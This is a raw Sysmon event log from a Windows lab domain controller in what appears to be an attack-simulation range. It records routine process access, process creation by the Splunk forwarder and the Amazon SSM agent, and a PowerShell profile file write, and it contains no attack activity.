12:01:05.860{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-6000-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.858{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.857{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.857{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.857{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-6000-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.857{266CAFBE-647E-6064-4300-00000000AE01}39243892C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-6481-6064-6000-00000000AE01}4072C:\Windows\System32\Wbem\wmic.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.857{266CAFBE-6481-6064-6000-00000000AE01}4072C:\Windows\System32\wbem\WMIC.exe10.0.14393.0 (rs1_release.160715-1616)WMI Commandline UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwmic.exewmic OS get OperatingSystemSKU /format:listC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=2CEE7F1AD77D8817E0F043E5E5ED1C83,SHA256=6679EA8FBEB539B5852CE8838420471FED0600F5050F3370DBB355DAC76BF072,IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 23542300x80000000000000002624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.820{266CAFBE-6481-6064-5900-00000000AE01}4012NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.737{266CAFBE-6481-6064-5E00-00000000AE01}33044016C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-647F-6064-5000-00000000AE01}3024C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.738{266CAFBE-6481-6064-5F00-00000000AE01}3024C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-6481-6064-5E00-00000000AE01}3304C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000002610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-5E00-00000000AE01}3304C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.721{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM3